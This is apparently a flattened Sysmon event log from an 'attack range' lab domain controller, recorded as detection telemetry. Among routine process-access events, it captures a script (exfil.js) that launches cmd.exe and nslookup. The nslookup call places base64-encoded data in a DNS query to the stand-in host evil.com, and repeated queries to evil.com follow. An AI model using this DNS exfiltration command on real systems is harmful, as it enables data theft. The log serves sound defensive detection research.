14:21:48.393{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044838Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.393{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044837Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.393{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044836Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.393{0A5DF930-E35B-6299-0500-000000006002}4121840C:\Windows\system32\csrss.exe{0A5DF930-18FC-629A-3107-000000006002}3964C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044835Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.393{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-18FC-629A-3107-000000006002}3964C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044834Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.394{0A5DF930-18FC-629A-3107-000000006002}3964C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000215168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.984{2E1864BB-18FD-629A-2E46-000000005F02}19606244C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-2F46-000000005F02}6496C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.968{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.968{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.968{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.968{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.968{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-2F46-000000005F02}6496C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.968{2E1864BB-18FD-629A-2D46-000000005F02}79964536C:\Windows\system32\cmd.exe{2E1864BB-18FD-629A-2F46-000000005F02}6496C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.982{2E1864BB-18FD-629A-2F46-000000005F02}6496C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FD-629A-2D46-000000005F02}7996C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsdnr.tmp 2>&1 10341000x8000000000000000215160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.953{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-2E46-000000005F02}1960C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.953{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-2E46-000000005F02}1960C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.953{2E1864BB-18FD-629A-2E46-000000005F02}19606244C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-2D46-000000005F02}7996C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.953{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-2E46-000000005F02}1960C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.937{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.937{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.937{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.937{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.937{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-2D46-000000005F02}7996C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.937{2E1864BB-18E0-629A-6742-000000005F02}39767304C:\Windows\System32\WScript.exe{2E1864BB-18FD-629A-2D46-000000005F02}7996C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.947{2E1864BB-18FD-629A-2D46-000000005F02}7996C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsdnr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000215149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.937{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.937{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000215147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.921{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlkssah.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000215146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.960{00000000-0000-0000-0000-000000000000}2568evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.866{00000000-0000-0000-0000-000000000000}32evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.803{00000000-0000-0000-0000-000000000000}5708evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.741{00000000-0000-0000-0000-000000000000}984evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.676{00000000-0000-0000-0000-000000000000}3724evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.605{00000000-0000-0000-0000-000000000000}1372evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.534{00000000-0000-0000-0000-000000000000}7408evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.473{00000000-0000-0000-0000-000000000000}7240evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.395{00000000-0000-0000-0000-000000000000}6432evil.com0::ffff:127.0.0.1;<unknown process> 